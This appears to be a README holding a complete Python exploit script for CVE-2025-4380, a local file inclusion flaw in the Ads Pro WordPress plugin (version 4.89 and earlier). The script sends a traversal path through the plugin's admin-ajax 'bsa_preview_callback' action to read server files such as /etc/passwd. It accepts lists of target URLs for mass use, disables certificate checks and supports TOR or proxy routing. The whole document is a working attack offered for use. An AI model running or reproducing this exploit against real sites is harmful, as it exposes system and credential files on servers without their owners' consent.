README.md
Rendering markdown...
#!/usr/bin/env python3
#By r0otk3r
import requests
import argparse
import sys
import os
from urllib.parse import urljoin
from urllib3.exceptions import InsecureRequestWarning
from requests.adapters import HTTPAdapter
from requests.packages.urllib3.util.retry import Retry
# Disable SSL warnings
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
BANNER = """
CVE-2025-4380 - Ads Pro Plugin <= 4.89 - Local File Inclusion (LFI)
Arbitrary File Reader Exploit.
"""
def setup_session(proxy=None):
session = requests.Session()
retries = Retry(total=3, backoff_factor=0.5, status_forcelist=[500, 502, 503, 504])
adapter = HTTPAdapter(max_retries=retries)
session.mount('http://', adapter)
session.mount('https://', adapter)
if proxy:
session.proxies = {"http": proxy, "https": proxy}
return session
def save_to_file(filename, content):
try:
with open(filename, 'a') as f:
f.write(content + "\n")
print(f"[+] Output saved to: {filename}")
except Exception as e:
print(f"[!] Failed to save output: {e}")
def dump_file(session, target, file_path, output_file=None):
endpoint = "/wp-admin/admin-ajax.php"
url = urljoin(target, endpoint)
data = {
"action": "bsa_preview_callback",
"bsa_template": file_path
}
print(f"\n[+] Exploiting {target} ...")
print(f"[+] Endpoint: {endpoint}")
try:
response = session.post(url, data=data, verify=False, timeout=10)
if response.status_code == 200:
print(f"[+] {target} is VULNERABLE!")
print(f"[+] Dumping file: {file_path}\n")
content = response.text.strip()
print(content)
if "open_basedir restriction in effect" in content:
print("[!] open_basedir restriction detected - LFI may be limited.")
if output_file:
save_to_file(output_file, f"\n=== {target} - {file_path} ===\n{content}")
return True
else:
print(f"[-] {target} returned HTTP {response.status_code}. Possible WAF or protection.")
return False
except Exception as e:
print(f"[ERROR] Could not connect to {target}: {e}")
return False
def load_targets(file_path):
with open(file_path, 'r') as f:
return [line.strip() for line in f if line.strip()]
def main():
parser = argparse.ArgumentParser(description="CVE-2025-4380 LFI Exploit")
parser.add_argument("-u", "--url", help="Single target URL (e.g., http://target.com)", required=False)
parser.add_argument("-l", "--list", help="File containing list of target URLs", required=False)
parser.add_argument("-p", "--path", help="File to include (e.g., ../../../../etc/passwd)", required=True)
parser.add_argument("--proxy", help="HTTP proxy or TOR (e.g., http://127.0.0.1:8080)", required=False)
parser.add_argument("-o", "--output", help="Output file to save results", required=False)
args = parser.parse_args()
print(BANNER)
if not args.url and not args.list:
print("[!] You must specify either --url or --list")
sys.exit(1)
targets = []
if args.url:
targets.append(args.url)
if args.list:
targets.extend(load_targets(args.list))
session = setup_session(proxy=args.proxy)
for target in targets:
dump_file(session, target, args.path, args.output)
if __name__ == "__main__":
main()